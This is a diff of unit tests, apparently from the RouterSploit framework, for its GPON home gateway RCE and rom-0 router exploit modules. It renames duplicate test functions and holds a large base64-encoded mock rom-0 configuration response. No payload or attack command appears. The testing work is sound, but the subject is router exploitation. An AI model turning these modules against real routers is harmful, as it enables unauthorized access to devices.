......@@ -7,6 +7,7 @@ from routersploit.modules.exploits.routers.multi.gpon_home_gateway_rce import Ex
mark = ""
first_req = 0
def apply_response1(*args, **kwargs):
global mark, first_req
......@@ -34,7 +35,7 @@ def apply_response_with_waiting(*args, **kwargs):
@mock.patch("routersploit.modules.exploits.routers.multi.gpon_home_gateway_rce.shell")
def test_check_success(mocked_shell, target):
def test_check_success1(mocked_shell, target):
""" Test scenario - successful check without waiting """
route_mock1 = target.get_route_mock("/GponForm/diag_Form", methods=["POST"])
......@@ -52,7 +53,7 @@ def test_check_success(mocked_shell, target):
@mock.patch("routersploit.modules.exploits.routers.multi.gpon_home_gateway_rce.shell")
def test_check_success(mocked_shell, target):
def test_check_success2(mocked_shell, target):
""" Test scenario - successful check with waiting """
route_mock1 = target.get_route_mock("/GponForm/diag_Form", methods=["POST"])
......
tests/exploits/routers/multi/test_rom0.py
......@@ -4,6 +4,7 @@ from routersploit.modules.exploits.routers.multi.rom0 import Exploit
response = b64decode(b"AQEAARlIZGJnYXJlYQAAAAAAAAAYAAAAAUgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACcQADH/xib290AAAAAAAAAAAAAAAgAAwBSHNwdC5kYXQAAAAAAAAAGrAP6AFoYXV0b2V4ZWMubmV0AAAB9AFaHBgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADO7dvbAAMACQAABmwIAADJZztbbbAADAAJAAAAxswhiLAhhNJyNhpOxlxTgf//E6GMADEbDDef/+OBwA7zyOB1MUIw6Bgf8tB//94E9vn/dAWS+MD/////+wBfsIj/+IY3/5P/r//xgf///////////////////////9A8iPyosmBhiORkLhoMxcMhoNBcMRxnfLA+QExfkAArjOC+I4oYjlDiOIuIA5jPDAw1zHYz4wP/////////////////60kkGAB4RmQFkCM7/////////////////3gACAAASIxX//////////////////////////////////////////////////////////////////////////////////////////+GAAgAALsAYH///////////////////kBxtgIAAMYUAKAjf/////////////////4gaMCASMVAAwRiv///9A/hAQBiZhQZGAnG8yGUY+/cq4H/jRf9STHA/QLAACyv1gf////YEgAC+vwGAAEABAONAeHoU37gf/////xEEIL/jQf84H///////////////////+mHHGpUqACkTsIP/A+eO+MD+7mwPpN4/88ds/OZb4gAQ5ZwlgbEeGB+5phNO8sACAAAdM/94H//1hmEIzywP//1Dk98gdD//6wP////////////7Yq/60X/mB/AVLUAjmPzA////+dkz8/P////ngf////////////////////////8TIACFZM2qSWTP/////xwP////////+Fkz////////////2wACAAATY8////6WTP///////////////////////////////////////+AVkz//////////////////////////////////////////////6wACAAAUwBgf////////////////////////AyAAhSJ4AgAB2TP/////////////////////////////////////////////////////////////////7wACAAAUb//////+FkzxAlkz///////////////////////////////////////////////////////////////////////0C2TP/////////////1wAAgAAHgAYH7f+Bcv6Y31wP//////////////+gHir/9aL/vA/gKAACCOY/MD////5gmcw4HhgABAAQDjAHh7Idgf////////////////////////////9TIACFKVpUoBrJn////////////////////////////////+2AAIAABarE//rZM////////////////////////////////////8QPZM//////////////////////////////+gRYVMGIjCgEIFh7/9cD///////////////////3gACAAAmo2///////////////////////////6CZL4AQMTMKYSwPjcVMD/zov+gH1zifQCwQEct9YH///8/YYH3h1EJLxGAAEAB0CDw9o/fA/////////////////////////////hkABClG0rIf4AKROxQ/8D5474wP7Lr8cD0w75wP147LeYFxnngf////////2HJ7xXnA///////6YAIAABohRf///////uCoWoBAAqMKAJQQvv///////3wP/////////////////////6A+PaAoFvDCh3MEfb/////////////////////9MD/////////lVqMD//+8T//////////////////cAAIAABLju///kdz/////////////////////////////////////////////fA///////////////////////////////////////////WACAAATZ4f///////////////////////YEkJf//3E////////////////////////////////////////////////////////////////88AACAAATq93//9gf////////////////////////////////////////////////////////////////9wJW////uJ///////////////////+GAAgAAEuP9/1Hc/////////////////////////////////////////////3wP///////////////////////////////////////////+YAIAABNnx//////////////////////yBI+X//9xP/////////////////////////////////////////////////////////////////1wAAIAABOsHf//2B////////////////////////////////////////////////////////////////UCVn///7if////////////////////5YACAAASY7n/////////////////////////////////////////////GB/////////////////////////////////////////////+wAIAABOoB////////////////////+4Ejpf//3E//////////////////////////////////////////////////////////////////88D94ACAAATMn/////////////////////////////////////////////////////////////////0BK4X//9xP//////////////////////TAAIAABLkff/SIP/////////////////////////////////////////+wP//////////////////////////////////////////////+OACAAATqEf//////////////////+oEjZf//3E//////////////////////////////////////////////////////////////////88D//uAAgAAEzZ////////////////////////////////////////////////////////////////wBK0X//9xP///////////////////////2wACAAAS5L2SIP/////////////////////////////////////////+wP////////////////////////////////////////////////ngAgAAE+iH/////////////////+YEjJf//3E//////////////////////////////////////////////////////////////////88D///+GAACAAAVOn///////////////////////////////8DJZIDACMMKA4gS0v///////////////////////////////sD///////////////////////////tgAgAAEiTN///////////////////////////////////////////////////////////////////////////////////////////hgAIAACuAGB////////////oHREgGAAYYUARAiN////////////1gf////////////+gFJFQMJJJ6TMXMBUAIAgABhgIRRf/////xAcIKf+B88gY3zxzgSFYmSFhmB8AG9EAAAC+piQAzq8AIGDIaDGcDgY83GTQeGB//UBxBjA/B9yLy0AgQAxM2EZaH4hQfGB+NB/zgf//////////////////////////////////9sAACAAAdJjX///////////////////////5WJP/MD////+2JPL8///7gkVgkVAbof/+JBNJyNhpOxl3v//jgf/////////////////////////////////8f+B85h3/////////////ICAQABABBkTQBBkAFQv//+wACAAATovn////////4CYZP////////5gf//6IZ//////////////////////////////////////////////////////////////////////mAAgAAJyzf/rZIgECgAAQAINMiTEOB/6C2iACCNM4RAWCACKH/jnfmB/////7/yMAE/8IABQQkTAxTKpBhH/7AXPAQhiukhxhYoYUhowBLWYzA6/8CmTIeeBtxvkzceYBAm49MDbj4wP/////////////////////////////////////////////////////////////////////////7YAIAAC4tAf///qGLotc6sJYHA9koCYtwkAEzdArtXhgf//////////9U7D+AVEmwoRB////E9Fy9U/jgQRfMQHo///8wP/9KHYgEARIwoCRAQTScjYaTsZeD/mBoYcADICRWCRVpf88D//////////8AGHl/////+IBK5jhCf/////kATJCE8CkVBkNRsMS+Msh4YH5kkf///////////////////////vgfOSRwzyfngfaSR/////////tgAgAAH+G/7YH//ypIf///////////YHzkkcNMn54H2kkf///////////////////////+aikbABBAIwphEAoARzaPGbh4Yj//////////gfM99sD////5gOK8GQymYwnU2HT3/5v8Awmv////88D//////////////////////////eACAAAZZJv/////////////////////////////////916AHnY2GE3DEazCv9a9H/////9KOFOAEChTCmEQCQxDC0/1wP//////////////////////////////////////////////+mACAAAiKE3////////+akqPIAFENRwlgZmBJTjEwIFDrlfp9DoHICCUC4QaGh5eym2SAX5hXCABCZXzntgf/////////////////////yU8gFAYkwphLA////////////////////////////////////KiZchomYUwlgf///////////////////1wAAIAABIjgf//////////////////////////////////////////////////////////////////////////////////////////4YACAAAUwBgf/////////////////////////////////////////////////////////////////////////////////////////4AN+v1KAvOhyGA2HOACAAAi8p64H///////8IX4ZTcZDGaDScIW3//kVCGMxiNhlvf//LApEKZMFpHMJ0Mp3MJ54v//gVIYHgICgcjeZDqYzpxv//DA////////6IIXf//4MBgMRuQRrx+AWI7A///////////////////////////////////////////////////////////2AAA3gAbqX//////wGxorYRYAQAQISDhLA///D/33jgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA